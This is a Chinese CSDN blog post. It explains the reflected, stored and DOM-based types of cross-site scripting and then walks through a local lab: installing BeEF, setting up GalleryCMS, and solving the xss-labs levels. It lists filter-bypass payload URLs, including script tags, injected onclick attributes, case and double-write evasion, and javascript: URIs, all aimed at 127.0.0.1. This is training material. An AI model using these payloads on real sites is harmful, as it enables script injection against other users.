xss总结

最新推荐文章于 2024-06-15 15:54:58 发布
最新推荐文章于 2024-06-15 15:54:58 发布
阅读量802 收藏
点赞数
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lkyqj/article/details/126072821
版权

xss跨站脚本攻击,(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS

类型一:反射型

特点:

1非持久型,不保存到正常的服务器数据库在中

2反射型xss的被攻击对象是特定的,使用含有反射型xss的特质url

类型二:储存型

特点:

1持久型,攻击脚本将被永久的存放在目标服务器的数据库或文件中,具有很高的隐蔽性

2储存型xss非特定攻击用户,攻击者将存储型xss代码写进有xss的网站上后,只要有访问这个连接就会被攻击

类型三:dom型

特点: 反射型xss和存储型xss会与后台交互,DOM型xss的实现过程都是在前台

DOM(Document Object Model),是一种文档对象模型,DOM通常用于代表在HTML、XHTML和XML中的对象,使用DOM可以允许程序和脚本动态地访问和更新文档的内容、结构和样式,本质就是一种树状的模型。 DOM型XSS是基于DOM文档对象模型的一种漏洞,所以受客户端浏览器的脚本代码所影响,而不是想前面两种会与服务器交互(不是解析,是交互)。 DOM型XSS是取决于输出的位置,并不取决于输出环境,因此也可以说DOM型XSS既有可能是反射型的,也有可能是存储型的,就是说它的输出点是在DOM位置上。

复现20字符短域名绕过

一、安装BEEF

1、在Kali中运行apt install beef-xss

2、运行beef

3、在浏览器访问

二、安装galleryCMS

*遇到一点小问题

在这里插入图片描述

解决方法:手动创建

mysql> create database gallerycms; Query OK, 1 row affected (0.00 sec)

2、点击注册后弹出错误提示

在这里插入图片描述

在这里插入图片描述

Error Number: 1364

Field 'last_ip' doesn't have a default value

INSERT INTO user (email_address, password, is_active, is_admin, created_at, uuid, updated_at) VALUES ('admin@163.com', 'd033e22ae348aeb5660fc2140aec35850c4da997', 1, 1, '2022-07-28 16:25:01', 'c6631386-0e4e-11ed-97c4-0a002700000c', '2022-07-28 16:25:01')

Filename: D:\phpstudy_pro\WWW\GalleryCMS-2.0\system\database\DB_driver.php

Line Number: 330

提示"last_ip"不能为空

解决方法:cmd进入数据库,添加"last_ip"字段,手动插入数据

mysql> use gallerycms; Database changed mysql> INSERT INTO user (email_address, password, is_active, is_admin, created_at, uuid, updated_at,last_ip) VALUES ('admin@163.com', 'd033e22ae348aeb5660fc2140aec35850c4da997', 1, 1, '2022-07-28 16:33:16', 'ed87d8bb-0e4f-11ed-97c4-0a002700000c', '2022-07-28 16:33:16','127.0.0.1'); Query OK, 1 row affected (0.00 sec)

刷新后登录成功进入

在这里插入图片描述

三、开始复现

1、创建一个栏目

在这里插入图片描述

2、准备绕过

<script>标签过长,使用<svg>标签,但也不够

3、缩短域名(域名跳转or重定向国内需要备案)+unicode三合一

℠ expands to sm ㏛ expands to sr st expands to st ㎭ expands to rad ℡ expands to tel

绕过 1级

http://127.0.0.1/xsslabs/level1.php?name=<script>alert(1)</script>

在这里插入图片描述

2级http://127.0.0.1/xsslabs/level2.php?keyword=1"οnclick="alert(1)

在这里插入图片描述

3级

http://127.0.0.1/xsslabs/level3.php?keyword=1'οnclick='alert(1)

4级

http://127.0.0.1/xsslabs/level4.php?keyword=1"οnclick="alert(1)

5级

http://127.0.0.1/xsslabs/level5.php?keyword=1">11111

6级

大小写未过滤【HTML不区分大小写,HTML->JavaScript生效】 http://127.0.0.1/xsslabs/level6.php?keyword=1"Onclick="alert(1)

7级

【双写过滤处】 http://127.0.0.1/xsslabs/level7.php?keyword=1"oonnclick="alert(1)

8级将字符转为ascll码

javascript:alert('1')

javascript:alert('1')

9级跳过过滤(将编码转换ascll)

javascript>>>>>javascript:alert('1

李凯 北信
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Xss总结
code_lab
06-13 734
1. 什么都没过滤的入门情况< script>alert(1)< /script>(练习时去掉空格) < img src=”XXXX”> < img src=1 onerror=alert(1);> 2. 输出在< script>< /script>之间的情况1.< /script>< script>XXX 2.针对输出在不同的场景,进行合适的过滤。 3. 输出在HTML属性里的情况有时候,输
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
【网络安全自学篇】八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结 本文主要介绍了网络安全领域中常见的几种攻击手段,包括CSS注入、越权访问、csrf-token窃取以及XSS跨站脚本攻击,并通过WHUCTF比赛中的...
XSS总结
weixin_30888707的博客
04-09 109
XSS是什么 1.跨站攻击脚本 复制代码 xss过滤方法 输入过滤输出编码 输入验证:输入是否仅仅是合法的字符 输入字符串是否超过最大限制 输入如果是数字,是否在指定的范围内 输入是否符合格式要求:如ip地址或者email地址 输入是否过滤了敏感字...
网络安全必学知识点之 XSS
最新发布
2301_77472496的博客
06-15 857
XSS 全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为 XSS。这是一种将任意 Javascript 代码插入到其他 Web 用户页面里执行以达到攻击目的的漏洞。
XSS跨站总结
02-09
### XSS跨站总结 #### 一、XSS跨站攻击概述 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的Web应用程序安全漏洞,它允许攻击者通过注入恶意脚本来攻击用户。这种攻击通常发生在用户浏览器上,利用的是...
32个触发事件XSS语句的总结
04-01
以下是对给定文件中提到的32个触发事件XSS语句的详细总结和解释: 1. **onmouseenter**: 当鼠标指针进入元素时触发。例如:`('bem')">123456</div>`。 2. **onmouseleave**: 当鼠标指针离开元素时触发。例如:`('...
xss平台源码
09-28
总结来说,"xss平台源码"是一个宝贵的教育资源和研究工具,它可以帮助我们理解和防御XSS攻击,提升Web安全水平。无论是对安全从业人员还是开发者来说,深入学习和研究这一平台,都将对职业生涯产生积极的影响。
xss-vuln学习通关总结
08-24
XSS漏洞详解】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,主要表现为黑客通过注入恶意脚本到网页中,从而在用户浏览网页时控制用户的浏览器。这种攻击最初因为涉及跨域而得名,但随着JavaScript的...
XSS知识总结
qq_43842093的博客
11-07 6797
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
XSS总结
孤的博客
10-02 481
原理 开发者在开发时,对客户端过滤严格,导致恶意的javascript代码在浏览器上执行 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的...
XSS学习总结21篇
qq_45300786的博客
06-18 650
所有的文章都是看源码分析的,但是我这里推荐用抓包工具看输出 这里我要补充一下xss的相关知识(这里非常非常重要,如果连这些都不知道,是很难做xss的) 一、html标签里可以继续写html标签 <p>giegie,我你男朋友不会揍我吧<script>alert(1)</script></p> 二、html元素的属性可以触发事件(https://www.runoob.com/html/html-attributes.html) HTML 属性 HTML 元素可
xss 总结
0ffs3t
10-18 6691
document.getElementById("y").innerHTML="xxxxxxxxxx"; document.write("xxxxxxxxxxxx"); $("#y").html("xxxxxxx"); aa.innerHTML="xxxxxxxxxxxx";  这种情况下。xxxxx只能使用 这种方式来触发JS。
xss总结
qq_45752705的博客
03-27 355
一、xss简介什么是XSSXXS攻击目的是在网页中嵌入客户端恶意脚本,最常用的攻击代码是JavaScriptXSS漏洞出现的原因程序对输入和输出的控制不够严格,导致"精心构造“的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害XSS的危害劫持用户cookie、点击构造的链接触发劫持cookie、框架钓鱼、刷流量、挂马、键盘记录、需要设置跨域二、xss的分类反射XSS 中危。
XSS简单总结
Aiwin的博客
07-11 1017
XSS的简单总结
跨域XSS总结:客户端与服务器端解决方案
"这篇PPT主要探讨了跨域XSS问题在构建混合应用中的解决方案,由Mehmet Akin主讲,涵盖了从2009年IBM公司的视角来看的多种跨域策略和技术,包括基本概念、同源策略、客户端和服务器端的解决方案,以及HTML5的跨文档...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值